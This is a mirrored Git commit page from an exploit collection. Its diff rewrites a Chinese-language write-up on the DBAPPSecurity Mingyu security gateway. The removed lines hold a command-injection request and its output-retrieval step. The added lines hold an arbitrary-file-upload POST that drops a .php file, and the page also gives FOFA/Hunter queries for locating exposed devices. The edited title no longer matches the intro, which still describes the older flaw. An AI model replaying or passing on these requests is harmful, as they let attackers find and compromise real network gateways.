admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update 安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞.md

Browse Source
This commit is contained in:
Rainyseason 2025-03-17 09:36:38 +08:00 committed by GitHub
parent f62c5086bb
commit 7db61d21e3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 17 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
wpoc/安恒/安恒明御安全网关/1.md
View File

@ -1,4 +1,4 @@
# 安恒明御安全网关aaa_portal_auth_config_reset存在远程命令执行漏洞
# 安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞
# 一、漏洞简介
安恒信息明御安全网关<font style="color:rgb(0, 0, 0);">以下简称“NGFW”秉持安全可视、简单有效的理念以资产为视角构建“事前+事中+事后”全流程防御的下一代安全防护体系,并融合传统防火墙、</font>入侵防御系统<font style="color:rgb(0, 0, 0);">、防病毒网关、上网行为管控、VPN网关、威胁情报等</font>安全模块<font style="color:rgb(0, 0, 0);">于一体的智慧化安全网关。安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞。攻击者可通过该漏洞获取服务器权限。</font>
@ -8,34 +8,26 @@
# 三、资产测绘
+ hunter`app.name="安恒明御安全网关"`
+ fofa`title="明御安全网关"`
+ 特征
![1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3.png](./img/HWXRZk-Pt7bBvocS/1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3-137994.png)
# 四、漏洞复现
```plain
GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: {hostname}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
POST /webui/?g=net_dynamic_pop_adv_submit HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 196
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="filename"; filename="9B9Ccd.php"
Content-Type: text/plain
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--
```
![1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd.png](./img/HWXRZk-Pt7bBvocS/1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd-686075.png)
获取命令执行结果
```plain
GET /sslvpn/stc.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: {hostname}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
```
![1703405938768-9fa01d85-610c-4b95-a221-8a3363171080.png](./img/HWXRZk-Pt7bBvocS/1703405938768-9fa01d85-610c-4b95-a221-8a3363171080-026969.png)
> 更新: 2024-07-17 17:22:16
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ggogol4vip7aq8zc>